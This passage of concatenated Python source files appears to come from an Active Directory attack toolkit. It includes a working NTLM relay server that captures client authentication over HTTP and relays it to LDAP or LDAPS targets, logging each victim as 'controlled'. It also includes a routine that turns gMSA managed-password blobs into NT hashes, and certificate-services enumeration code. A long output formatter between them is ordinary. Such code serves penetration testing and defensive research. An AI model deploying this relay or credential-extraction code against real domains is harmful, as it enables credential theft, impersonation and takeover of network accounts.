				logging.error('Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )')
		return None, STATUS_ACCESS_DENIED

class LDAPSRelayServer(LDAPRelayServer):
	def __init__(self, serverConfig, target, targetPort = 636, extendedSecurity=True ):
		LDAPRelayClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)

	def initConnection(self):
		self.ldap_relay.scheme = "LDAPS"
		self.server = ldap3.Server("ldaps://%s:%s" % (self.targetHost, self.targetPort), get_info=ldap3.ALL)
		self.session = ldap3.Connection(self.server, user="a", password="b", authentication=ldap3.NTLM)
		try:
			self.session.open(False)
		except:
			pass
		return True

class HTTPRelayServer(HTTPRelayServer):
	class HTTPHandler(HTTPRelayServer.HTTPHandler):
		def do_relay(self, messageType, token, proxy, content = None):
			if messageType == 1:
				if self.server.config.disableMulti:
					self.target = self.server.config.target.getTarget(multiRelay=False)
					if self.target is None:
						logging.info("HTTPD(%s): Connection from %s controlled, but there are no more targets left!" % (
							self.server.server_address[1], self.client_address[0]))
						self.send_not_found()
						return
  
					logging.info("HTTPD(%s): Connection from %s controlled, attacking target %s://%s" % (
						self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
				try:
					ntlm_nego = self.do_ntlm_negotiate(token, proxy=proxy)
				except ldap3.core.exceptions.LDAPSocketOpenError as e:
					logging.debug(str(e))
					sys.exit(-1)

				if not ntlm_nego:
					# Connection failed
					if self.server.config.disableMulti:
						logging.error('HTTPD(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
								  self.target.scheme, self.target.netloc))
						self.server.config.target.logTarget(self.target)
						self.send_not_found()
						return
					else:
						logging.error('HTTPD(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
							self.server.server_address[1], self.target.scheme, self.target.netloc))

						self.server.config.target.logTarget(self.target)
						self.target = self.server.config.target.getTarget(identity=self.authUser)

						if self.target is None:
							logging.info( "HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
								(self.server.server_address[1], self.authUser, self.client_address[0]))
							self.send_not_found()
							return

						logging.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
							self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))

						self.do_REDIRECT()

			elif messageType == 3:
				authenticateMessage = NTLMAuthChallengeResponse()
				authenticateMessage.fromString(token)

				if self.server.config.disableMulti:
					if authenticateMessage['flags'] & NTLMSSP_NEGOTIATE_UNICODE:
						self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
													authenticateMessage['user_name'].decode('utf-16le'))).upper()
					else:
						self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
													authenticateMessage['user_name'].decode('ascii'))).upper()

					target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)

				if not self.do_ntlm_auth(token, authenticateMessage):
					logging.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
																			   self.authUser))
					if self.server.config.disableMulti:
						self.send_not_found()
						return
					# Only skip to next if the login actually failed, not if it was just anonymous login or a system account
					# which we don't want
					if authenticateMessage['user_name'] != '':  # and authenticateMessage['user_name'][-1] != '$':
						self.server.config.target.logTarget(self.target)
						# No anonymous login, go to next host and avoid triggering a popup
						self.target = self.server.config.target.getTarget(identity=self.authUser)
						if self.target is None:
							logging.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" %
								(self.server.server_address[1], self.authUser, self.client_address[0]))
							self.send_not_found()
							return

						logging.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
							self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))

						self.do_REDIRECT()
					else:
						# If it was an anonymous login, send 401
						self.do_AUTHHEAD(b'NTLM', proxy=proxy)
				else:
					# Relay worked, do whatever we want here...
					logging.info("HTTPD(%s): Authenticating against %s://%s as %s SUCCEED" % (self.server.server_address[1],
						self.target.scheme, self.target.netloc, self.authUser))
					if self.server.config.disableMulti:
						# We won't use the redirect trick, closing connection...
						if self.command == "PROPFIND":
							self.send_multi_status(content)
						else:
							self.send_not_found()
						return
					else:
						# Let's grab our next target
						self.target = self.server.config.target.getTarget(identity=self.authUser)

						if self.target is None:
							LOG.info("HTTPD(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
								self.server.server_address[1], self.authUser, self.client_address[0]))

							# Return Multi-Status status code to WebDAV servers
							if self.command == "PROPFIND":
								self.send_multi_status(content)
								return

							# Serve image and return 200 if --serve-image option has been set by user
							if (self.server.config.serve_image):
								self.serve_image()
								return

							# And answer 404 not found
							self.send_not_found()
							return

						# We have the next target, let's keep relaying...
						logging.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
							self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
						self.do_REDIRECT()

class Relay:
	def __init__(self, target, interface="0.0.0.0", port=80, args=None):
		self.target = target
		self.interface = interface
		self.port = port
		self.args = args
		self.ldap_session = None
		self.ldap_server = None
		self.scheme = None

		target = TargetsProcessor(
					singleTarget=self.target, protocolClients={
							"LDAP": self.get_relay_ldap_server,
							"LDAPS": self.get_relay_ldaps_server,
						}
				)

		config = NTLMRelayxConfig()
		config.setTargets(target)
		config.setInterfaceIp(interface)
		config.setListeningPort(port)
		config.setProtocolClients(
			{
				"LDAP": self.get_relay_ldap_server,
				"LDAPS": self.get_relay_ldaps_server,
			}
		)
		config.setMode("RELAY")
		config.setDisableMulti(True)
		self.server = HTTPRelayServer(config)

	def get_scheme(self):
		return self.scheme

	def get_ldap_session(self):
		return self.ldap_session

	def get_ldap_server(self):
		return self.ldap_server

	def start(self):
		self.server.start()

		try:
			while True:
				if self.ldap_session is not None:
					logging.debug("Success! Relayed to the LDAP server. Closing HTTP Server")
					self.server.server.server_close()
					break
				sleep(0.1)
		except KeyboardInterrupt:
			print("")
			self.shutdown()
		except Exception as e:
			logging.error("Got error: %s" % e)
			sys.exit()

	def get_relay_ldap_server(self, *args, **kwargs) -> LDAPRelayClient:
		relay_server = LDAPRelayServer(*args, **kwargs)
		relay_server.ldap_relay = self
		return relay_server

	def get_relay_ldaps_server(self, *args, **kwargs) -> LDAPRelayClient:
		relay_server = LDAPSRelayServer(*args, **kwargs)
		relay_server.ldap_relay = self
		return relay_server

	def shutdown(self):
		logging.info("Exiting...")
		sys.exit(0)



#!/usr/bin/env python3
from powerview.utils.colors import bcolors
from powerview.lib.resolver import (
    UAC,
    ENCRYPTION_TYPE,
    LDAP
)
from powerview import PowerView as PV
from powerview.utils.logging import LOG
from powerview.utils.helpers import IDict
from powerview.utils.constants import TABLE_FMT_MAP

import ldap3
import json
import re
import logging
import base64
import datetime
from tabulate import tabulate as table
from io import StringIO
import csv

class FORMATTER:
    def __init__(self, pv_args, use_kerberos=False):
        self.__newline = '\n'
        self.args = pv_args
        self.use_kerberos = use_kerberos

    def count(self, entries):
        print(len(entries))

    def print_table(self, entries: list, headers: list, align: str = None):
        table_format = TABLE_FMT_MAP.get(self.args.tableview, "simple")
        filtered_entries = [entry for entry in entries if not all(e == '' for e in entry)]
        print()
        if table_format == "csv":
            output = StringIO()
            csv_writer = csv.writer(output,quoting=csv.QUOTE_ALL)
            if headers:
                csv_writer.writerow(headers)
            csv_writer.writerows(filtered_entries)
            table_res = output.getvalue()
            output.close()
        else:
            table_res = table(
                filtered_entries,
                headers,
                numalign="left" if not align else align,
                tablefmt=table_format
            )
        if self.args.outfile:
            LOG.write_to_file(self.args.outfile, table_res)
        print(table_res)
        print()

    def print_index(self, entries):
        i = self.args.select
        for entry in entries[0:i]:
            if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                if isinstance(entry, ldap3.abstract.entry.Entry):
                    entry = json.loads(entry.entry_to_json())
                entry = self.resolve_values(entry)
                for attr,value in entry['attributes'].items():
                    # Check dictionary in a list
                    if isinstance(value, list):
                        for i in value:
                            if (isinstance(i,dict)) and ("encoded" in i.keys()):
                                value = str(i["encoded"])
                            if isinstance(i,int):
                                value = str(i)

                    value = self.beautify(value,self.get_max_len(list(entry['attributes'].keys()))+2)
                    if isinstance(value,list):
                        if len(value) != 0:
                            value = self.clean_value(value)

                            _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {f'''{self.__newline.ljust(self.get_max_len(list(entry['attributes'].keys()))+3)}'''.join(value)}"
                            if self.args.outfile:
                                LOG.write_to_file(self.args.outfile, _stdout)
                            print(_stdout)
                    else:
                        _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {value}"
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, _stdout)
                        print(_stdout)
                if self.args.outfile:
                    LOG.write_to_file(self.args.outfile, "")
                print()
            elif isinstance(entry['attributes'],list):
                entry = self.resolve_values(entry)
                for ace in entry['attributes'][0:i]:
                    for attr, value in ace.items():
                        _stdout = f"{attr.ljust(28)}: {value}"
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, _stdout)
                        print(_stdout)
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()

    def print_select(self,entries):
        select_attributes = self.args.select
        for entry in entries:
            if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                if isinstance(entry, ldap3.abstract.entry.Entry):
                    entry = json.loads(entry.entry_to_json())
                entry = self.resolve_values(entry)
                for key in list(entry["attributes"].keys()):
                    for attr in select_attributes:
                        if (str(attr).casefold() == str(key).casefold()):
                            value = ""
                            # Check dictionary in a list
                            if isinstance(entry['attributes'][key], list):
                                entry['attributes'][key] = self.clean_value(entry['attributes'][key])
                                for i in entry['attributes'][key]:
                                    if (isinstance(i,dict)) and ("encoded" in i.keys()):
                                        value = str(i["encoded"])
                                    else:
                                        if len(select_attributes) == 1:
                                            value += str(i)+"\n"
                                        else:
                                            value += str(i)+"\n"+''.ljust(self.get_max_len(select_attributes)+2)
                            else:
                                value = str(entry['attributes'][key])
                            value = value.strip()
                            if len(value) != 0:
                                if len(select_attributes) == 1:
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, value)
                                    print(value)
                                else:
                                    _stdout = f"{key.ljust(self.get_max_len(select_attributes))}: {value}"
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, _stdout)
                                    print(_stdout)
                if len(select_attributes) != 1:
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()
            elif isinstance(entry['attributes'], list):
                entry = self.resolve_values(entry)
                for ace in entry['attributes']:
                    for key in list(ace.keys()):
                        for attr in select_attributes:
                            if str(attr).casefold() == str(key).casefold():
                                if len(select_attributes) == 1:
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, ace[key])
                                    print(ace[key])
                                else:
                                    _stdout = f"{key.ljust(28)}: {ace[key]}"
                                    if self.args.outfile:
                                        LOG.write_to_file(self.args.outfile, _stdout)
                                    print(_stdout)
                    if len(select_attributes) != 1:
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, "")
                        print()

    def table_view(self, entries):
        headers = []
        rows = []
        nested_list = False
        if (hasattr(self.args, "select") and self.args.select) or (hasattr(self.args, "properties") and self.args.properties and not self.args.properties == '*'):
            if self.args.select:
                headers = self.args.select
            elif self.args.properties:
                headers = self.args.properties
        else:
            if isinstance(entries[0]["attributes"], dict) or isinstance(entries[0]["attributes"], ldap3.utils.ciDict.CaseInsensitiveDict):
                headers = entries[0]["attributes"].keys()
            elif isinstance(entries[0]["attributes"], list):
                headers = entries[0]["attributes"][0].keys()
                nested_list = True

        if isinstance(entries[0]["attributes"], list):
            for entry in entries:
                for ent in entry["attributes"]:
                    row = []
                    for head in headers:
                        val = IDict(ent).get(head) # IDict give get() with case-insensitive capabilities :)
                        if isinstance(val,list):
                            temp = ""
                            for attr in val:
                                if isinstance(attr, bytes):
                                    temp += base64.b64encode(attr).decode("utf-8") + "\n"
                                elif isinstance(attr, int):
                                    temp = str(attr)
                                elif isinstance(attr, datetime.datetime):
                                    temp = str(attr.strftime('%m/%d/%Y'))
                                else:
                                    temp += attr + "\n"
                            val = temp
                        elif isinstance(val, int):
                            val = str(val)
                        elif isinstance(val, bytes):
                            val = base64.b64encode(val).decode("utf-8")
                        elif isinstance(val, datetime.datetime):
                            val = str(val.strftime('%m/%d/%Y'))

                        row.append(
                                val 
                                )
                    rows.append(row)
        else:
            for entry in entries:
                row = []
                for head in headers:
                    val = IDict(entry["attributes"]).get(head) # IDict give get() with case-insensitive capabilities :)

                    if isinstance(val,list):
                        temp = ""
                        for attr in val:
                            if isinstance(attr, bytes):
                                temp += base64.b64encode(attr).decode("utf-8") + "\n"
                            elif isinstance(attr, int):
                                temp = str(attr)
                            elif isinstance(attr, datetime.datetime):
                                temp = str(attr.strftime('%m/%d/%Y'))
                            else:
                                temp += attr + "\n"
                        val = temp
                    elif isinstance(val, int):
                        val = str(val)
                    elif isinstance(val, bytes):
                        val = base64.b64encode(val).decode("utf-8")
                    elif isinstance(val, datetime.datetime):
                        val = str(val.strftime('%m/%d/%Y'))

                    row.append(
                            val 
                            )

                rows.append(row)

        self.print_table(entries=rows, headers=headers)

    def print(self,entries):
        for entry in entries:
            have_entry = False
            if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                if isinstance(entry, ldap3.abstract.entry.Entry):
                    entry = json.loads(entry.entry_to_json())
                entry = self.resolve_values(entry)
                for attr,value in entry['attributes'].items():
                    # Check dictionary in a list
                    if isinstance(value, list):
                        for i in value:
                            if (isinstance(i,dict)) and ("encoded" in i.keys()):
                                value = str(i["encoded"])
                            if isinstance(i,int):
                                value = str(i)

                    value = self.beautify(value,self.get_max_len(list(entry['attributes'].keys()))+2)

                    if isinstance(value,list):
                        if len(value) != 0:
                            value = self.clean_value(value)

                            have_entry = True
                            _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {f'''{self.__newline.ljust(self.get_max_len(list(entry['attributes'].keys()))+3)}'''.join(value)}"
                            if self.args.outfile:
                                LOG.write_to_file(self.args.outfile, _stdout)
                            print(_stdout)
                    else:
                        have_entry = True
                        _stdout = f"{attr.ljust(self.get_max_len(list(entry['attributes'].keys())))}: {str(value)}"
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, _stdout)
                        print(_stdout)
                if have_entry:
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()
            elif isinstance(entry['attributes'],list):
                entry = self.resolve_values(entry)
                for ace in entry['attributes']:
                    for k, v in ace.items():
                        _stdout = f'{k.ljust(28)}: {v}'
                        if self.args.outfile:
                            LOG.write_to_file(self.args.outfile, _stdout)
                        print(_stdout)
                    if self.args.outfile:
                        LOG.write_to_file(self.args.outfile, "")
                    print()
            elif isinstance(entry, str):
                entry = self.resolve_values(entry)
                if self.args.outfile:
                    LOG.write_to_file(self.args.outfile, entry)
                print(entry)

    def sort_entries(self, entries, sort_option):
        try:
            def sort_key(entry):
                if sort_option.lower() not in [v.lower() for v in entry["attributes"].keys()]:
                    raise Exception("%s key not found" % (sort_option))

                if not isinstance(entry["attributes"], ldap3.utils.ciDict.CaseInsensitiveDict):
                    entry["attributes"] = IDict(entry["attributes"])

                value = entry['attributes'].get(sort_option)
                if isinstance(value, str):
                    return value.lower()
                elif isinstance(value, list):
                    if sort_option.lower() in ["badpasswordtime", "lastlogoff", "lastlogon", "pwdlastset", "lastlogontimestamp"]:
                        return datetime.datetime.min
                    else:
                        return value
                else:
                    logging.warning("Value not compatible for sorting. Skipping...")
                    return value

            sorted_users = sorted(entries, key=sort_key)
            return sorted_users
        except AttributeError:
            logging.warning("Failed to sort. Probably value is not a string. Skipping...")
            return entries
        except KeyError as e:
            raise KeyError("%s key not found" % str(e))
        finally:
            logging.warning("Failed sort to with unknown error")
            return entries

    def alter_entries(self,entries,cond):
        temp_alter_entries = []
        try:
            left,right = re.split(' con | cont | conta | contai | contain | contains | eq | equ | equa | equal | match | mat | matc | not | != |!=| = |=C|=D', cond, flags=re.IGNORECASE)
            operator = re.search(' con | cont | conta | contai | contain | contains | eq | equ | equa | equal | match | mat | matc | not | != |!=| = |=C|=D', cond, re.IGNORECASE).group(0)
            left = left.strip("'").strip('"').strip()
            operator = operator.strip("'").strip('"').strip()
            right = right.strip("'").strip('"').strip()
        except:
            logging.error('Where argument format error. (e.g. "samaccountname contains admin")')
            return
        if (operator in "contains") or (operator in "match"):
            for entry in entries:
                if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        temp_entry = json.loads(entry.entry_to_json())
                    else:
                        temp_entry = entry
                    for c in list(temp_entry['attributes'].keys()):
                        if str(c).casefold() == str(left).casefold():
                            left = c
                            break
                    try:
                        if str(right).casefold() in str(temp_entry['attributes'][left]).casefold():
                            temp_alter_entries.append(entry)
                    except KeyError:
                        return None
                elif isinstance(entry['attributes'],list):
                    temp_aces = []
                    for ace in entry['attributes']:
                        for c in list(ace.keys()):
                            if str(c).casefold() == str(left).casefold():
                                left = c
                                break
                        try:
                            if str(right).casefold() in str(ace[left]).casefold():
                                temp_aces.append(ace)
                        except KeyError:
                            pass
                    entry['attributes'] = temp_aces
                    temp_alter_entries.append(entry)

        elif (operator in "equal") or (operator == "="):
            for entry in entries:
                if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        temp_entry = json.loads(entry.entry_to_json())
                    else:
                        temp_entry = entry
                    for c in list(temp_entry['attributes'].keys()):
                        if str(c).casefold() == str(left).casefold():
                            left = c
                            break
                    try:
                        if str(right).casefold() == str(temp_entry['attributes'][left]).casefold():
                            temp_alter_entries.append(entry)
                    except KeyError:
                        pass
                elif isinstance(entry['attributes'],list):
                    temp_aces = []
                    for ace in entry['attributes']:
                        for c in list(ace.keys()):
                            if str(c).casefold() == str(left).casefold():
                                left = c
                                break
                        try:
                            if str(right).casefold() == str(ace[left]).casefold():
                                temp_aces.append(ace)
                        except KeyError:
                            pass
                    entry['attributes'] = temp_aces
                    temp_alter_entries.append(entry)
        elif (operator.lower() == "not") or (operator.lower() == "!="):
            for entry in entries:
                if isinstance(entry,ldap3.abstract.entry.Entry) or isinstance(entry['attributes'], dict) or isinstance(entry['attributes'], ldap3.utils.ciDict.CaseInsensitiveDict):
                    if isinstance(entry, ldap3.abstract.entry.Entry):
                        temp_entry = json.loads(entry.entry_to_json())
                    else:
                        temp_entry = entry
                    for c in list(temp_entry['attributes'].keys()):
                        if str(c).casefold() == str(left).casefold():
                            left = c
                            break
                    try:
                        if not (len(str(''.join(temp_entry['attributes'][left])).casefold()) == 0) and (str(right).casefold() == "null"):
                            temp_alter_entries.append(entry)
                        elif str(''.join(temp_entry['attributes'][left])).casefold() != str(right).casefold():
                            temp_alter_entries.append(entry)
                    except KeyError:
                        pass
                elif isinstance(entry['attributes'],list):
                    temp_aces = []
                    for ace in entry['attributes']:
                        for c in list(ace.keys()):
                            if str(c).casefold() == str(left).casefold():
                                left = c
                                break
                        try:
                            if str(right).casefold() != str(ace[left]).casefold():
                                temp_aces.append(ace)
                        except KeyError:
                            pass
                    entry['attributes'] = temp_aces
                    temp_alter_entries.append(entry)
        else:
            logging.error(f'Invalid operator')

        return temp_alter_entries

    def resolve_values(self,entry):
        # resolve msDS-SupportedEncryptionTypes
        #try:
        #    if "msDS-SupportedEncryptionTypes" in list(entry["attributes"].keys()):
        #        if isinstance(entry['attributes']['msDS-SupportedEncryptionTypes'], list):
        #            entry["attributes"]["msDS-SupportedEncryptionTypes"] = ENCRYPTION_TYPE.parse_value(entry["attributes"]["msDS-SupportedEncryptionTypes"][0])
        #        else:
        #            entry["attributes"]["msDS-SupportedEncryptionTypes"] = ENCRYPTION_TYPE.parse_value(entry["attributes"]["msDS-SupportedEncryptionTypes"])
        #except:
        #    pass

        #        # resolve userAccountControl
        #        try:
        #            if "userAccountControl" in list(entry["attributes"].keys()):
        #                if isinstance(entry['attributes']['userAccountcontrol'], list):
        #                    entry["attributes"]["userAccountControl"] = UAC.parse_value(entry['attributes']['userAccountControl'][0])
        #                else:
        #                    entry["attributes"]["userAccountControl"] = UAC.parse_value(entry["attributes"]["userAccountControl"])
        #        except:
        #            pass

        return entry

    def get_max_len(self, lst):
        return len(max(lst,key=len)) + 5

    def clean_value(self, value):
        temp = []
        for i in range(len(value)):
            if isinstance(value[i], list):
                temp += value[i]
            else:
                temp.append(value[i])
        
        return temp

    def beautify(self, strs,lens):
        if isinstance(strs,str) and not self.args.nowrap:
            temp = ""
            if len(strs) > 100:
                index = 100
                for i in range(0,len(strs),100):
                    temp += f"{str(strs[i:index])}\n"
                    temp += ''.ljust(lens)
                    index+=100
            else:
                temp = f"{str(strs).ljust(lens)}"

            return temp.strip()
        elif isinstance(strs, list) and not self.args.nowrap:
            for i in range(len(strs)):
                if isinstance(strs[i], datetime.datetime):
                    strs[i] = strs[i].strftime('%m/%d/%Y')
                elif isinstance(strs[i], bytes):
                    strs[i] = base64.b64encode(strs[i]).decode('utf-8')
                    temp = ""
                    if len(strs[i]) > 100:
                        index = 100
                        for j in range(0,len(strs[i]),100):
                            temp += f"{str(strs[i][j:index])}\n"
                            temp += ''.ljust(lens)
                            index+=100
                    else:
                        temp = f"{str(strs[i]).ljust(lens)}"

                    strs[i] = temp.strip()
            return strs
        elif isinstance(strs, bytes):
            strs = base64.b64encode(strs).decode("utf-8")
            return strs
        else:
            return str(strs)



#!/usr/bin/env python3
from powerview.utils.constants import MSDS_MANAGEDPASSWORD_BLOB
from Cryptodome.Hash import MD4
from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR

import binascii

class GMSA:
	@staticmethod
	def decrypt(blob):
		blob = MSDS_MANAGEDPASSWORD_BLOB(blob)
		hash = MD4.new()
		hash.update(blob["CurrentPassword"][:-2])
		passwd = (
		    binascii.hexlify(hash.digest()).decode()
		)
		return passwd

	@staticmethod
	def read_acl(secDesc):
		sids = []
		if not secDesc:
			return

		for dacl in SR_SECURITY_DESCRIPTOR(data=secDesc)['Dacl']['Data']:
			sids.append(dacl['Ace']['Sid'].formatCanonical())

		return sids



#!/usr/bin/env python3
from powerview.utils.colors import bcolors

def get_prompt(init_proto, server_dns, cur_user):
	return (f'{bcolors.OKBLUE}({bcolors.ENDC}{bcolors.WARNING}{bcolors.BOLD}{init_proto}{bcolors.ENDC}'
			f'{bcolors.OKBLUE})-[{bcolors.ENDC}{server_dns}{bcolors.OKBLUE}]-[{bcolors.ENDC}{cur_user}'
			f'{bcolors.OKBLUE}]{bcolors.ENDC}\n{bcolors.OKBLUE}PV > {bcolors.ENDC}')


#!/usr/bin/env python3
import logging
from impacket.ldap import ldaptypes
from impacket.uuid import bin_to_string, string_to_bin
from ldap3.protocol.formatters.formatters import format_sid
from ldap3.protocol.microsoft import security_descriptor_control
from ldap3 import SUBTREE, BASE, LEVEL
import socket

from powerview.utils.helpers import strip_entry

from powerview.utils.helpers import (
    is_admin_sid,
    filetime_to_str,
    get_user_sids,
    host2ip,
    get_random_num,
    get_random_hex,
)
from powerview.utils.constants import (
    ACTIVE_DIRECTORY_RIGHTS,
    CERTIFICATE_RIGHTS,
    CERTIFICATION_AUTHORITY_RIGHTS,
    MS_PKI_CERTIFICATE_NAME_FLAG,
    MS_PKI_ENROLLMENT_FLAG,
    OID_TO_STR_MAP,
    WELL_KNOWN_SIDS,
    EXTENDED_RIGHTS_NAME_MAP
)

INHERITED_ACE = 0x10

#stolen from https://github.com/ly4k/Certipy
class ActiveDirectorySecurity:
    RIGHTS_TYPE = ACTIVE_DIRECTORY_RIGHTS

    def __init__(
        self,
        security_descriptor: bytes,
    ):
        sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
        sd.fromString(security_descriptor)
        self.sd = sd

        self.owner = format_sid(sd["OwnerSid"].getData())
        self.aces = {}

        aces = sd["Dacl"]["Data"]
        for ace in aces:
            sid = format_sid(ace["Ace"]["Sid"].getData())

            if sid not in self.aces:
                self.aces[sid] = {
                    "rights": self.RIGHTS_TYPE(0),
                    "extended_rights": [],
                    "inherited": ace["AceFlags"] & INHERITED_ACE == INHERITED_ACE,
                }

            if ace["AceType"] == ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:
                self.aces[sid]["rights"] |= self.RIGHTS_TYPE(ace["Ace"]["Mask"]["Mask"])

            if ace["AceType"] == ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE:
                if ace["Ace"]["Flags"] == 2:
                    uuid = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower()
                elif ace["Ace"]["Flags"] == 1:
                    uuid = bin_to_string(ace["Ace"]["ObjectType"]).lower()
                else:
                    continue

                self.aces[sid]["extended_rights"].append(uuid)

class CertificateSecurity(ActiveDirectorySecurity):
    RIGHTS_TYPE = CERTIFICATE_RIGHTS

class CAEnum:
    def __init__(self, ldap_session, root_dn):
        self.ldap_session = ldap_session
        self.root_dn = root_dn

    def fetch_root_ca(self, properties=['*']):
        enroll_filter = "(objectclass=certificationAuthority)"
        ca_search_base = f"CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,{self.root_dn}"
        logging.debug(f'LDAP Base: {ca_search_base}')
        logging.debug(f'LDAP Filter: {enroll_filter}')
        
        entries = []
        entry_generator = self.ldap_session.extend.standard.paged_search(ca_search_base, enroll_filter, attributes=list(properties), paged_size=1000, generator=True)
        for _entries in entry_generator:
            if _entries['type'] != 'searchResEntry':
                continue
            strip_entry(_entries)
            entries.append(_entries)
        return entries

    def fetch_enrollment_services(self, properties=['*'], searchbase=None, search_scope=SUBTREE):
        enroll_filter = "(objectCategory=pKIEnrollmentService)"

        if not searchbase:
            searchbase = "CN=Configuration,{}".format(self.root_dn)

        entries = []
        entry_generator = self.ldap_session.extend.standard.paged_search(searchbase, enroll_filter, attributes=list(properties), paged_size=1000, generator=True, search_scope=search_scope)
        for _entries in entry_generator:
            if _entries['type'] != 'searchResEntry':
                continue
            strip_entry(_entries)
            entries.append(_entries)
        return entries

    def get_certificate_templates(self, properties=None, ca_search_base=None, identity=None):
        if not properties:
            properties = [
                "objectClass",
                "cn",
                "distinguishedName",
                "name",
                "displayName",
                "pKIExpirationPeriod",
                "pKIOverlapPeriod",
                "msPKI-Enrollment-Flag",
                "msPKI-Private-Key-Flag",
                "msPKI-Certificate-Name-Flag",
                "msPKI-Cert-Template-OID",
                "msPKI-RA-Signature",
                "pKIExtendedKeyUsage",
                "nTSecurityDescriptor",
                "objectGUID",
                "msPKI-Template-Schema-Version",
                "msPKI-Certificate-Policy",
                "msPKI-Minimal-Key-Size"
            ]
        ca_search_base = f"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,{self.root_dn}" if not ca_search_base else ca_search_base
        search_filter = ""
        identity_filter = ""

        if identity:
            identity_filter = f"(|(cn={identity})(displayName={identity}))"

        search_filter = f"(&(objectclass=pkicertificatetemplate){identity_filter})"

        logging.debug(f"LDAP Filter: {search_filter}")

        self.ldap_session.search(
            ca_search_base,
            search_filter,
            attributes=properties,
            controls = security_descriptor_control(sdflags=0x5),
        )

        return self.ldap_session.entries

    # https://github.com/ly4k/Certipy/blob/main/certipy/commands/find.py#L688
    def check_web_enrollment(self, target, nameserver=None, timeout=5, use_ip=False, use_system_ns=True):
        if use_ip:
            target = host2ip(target, nameserver, 3, True, use_system_ns)

        if target is None:
            logging.debug("No target found")
            return False

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            logging.debug("Default timeout is set to 5")
            sock.settimeout(timeout)
            logging.debug("Connecting to %s:80" % target)
            sock.connect((target, 80))
            sock.sendall(
                "\r\n".join(
                    ["HEAD /certsrv/ HTTP/1.1", "Host: %s" % target, "\r\n"]
                ).encode()
            )
            resp = sock.recv(256)
            sock.close()
            head = resp.split(b"\r\n")[0].decode()

            return " 404 " not in head
        except ConnectionRefusedError:
            return False
        except socket.timeout:
            logging.debug("Can't reach %s" % (target))
            return False
        except Exception as e:
            logging.warning(
                "Got error while trying to check for web enrollment: %s" % e
            )
            return False

        return False

    def get_issuance_policies(self, properties=None):
        if not properties:
            properties = [
                "cn",
                "name", 
                "displayName",
                "msDS-OIDToGroupLink",
                "msPKI-Cert-Template-OID",
                "nTSecurityDescriptor",
                "objectGUID"
            ]
        searchbase = f"CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,{self.root_dn}"
        ldap_filter = "(objectclass=msPKI-Enterprise-Oid)"
        entries = []
        entry_generator = self.ldap_session.extend.standard.paged_search(
            searchbase,
            ldap_filter,
            attributes=list(properties), 
            paged_size=1000,
            generator=True,
            controls=security_descriptor_control(sdflags=0x5)
        )
        for _entries in entry_generator:
            if _entries['type'] != 'searchResEntry':
                continue
            strip_entry(_entries)
            entries.append(_entries)
        return entries

class PARSE_TEMPLATE:
    def __init__(self, template, current_user_sid=None, linked_group=None, ldap_session=None):
        self.template = template
        self.owner_sid = None
        self.parsed_dacl = {}
        self.certificate_name_flag = None
        self.enrollment_flag = None
        self.extended_key_usage = None
        self.validity_period = None
        self.client_authentication = False
        self.enrollee_supplies_subject = False
        self.any_purpose = False
        self.enrollment_agent = False
        self.requires_manager_approval = False
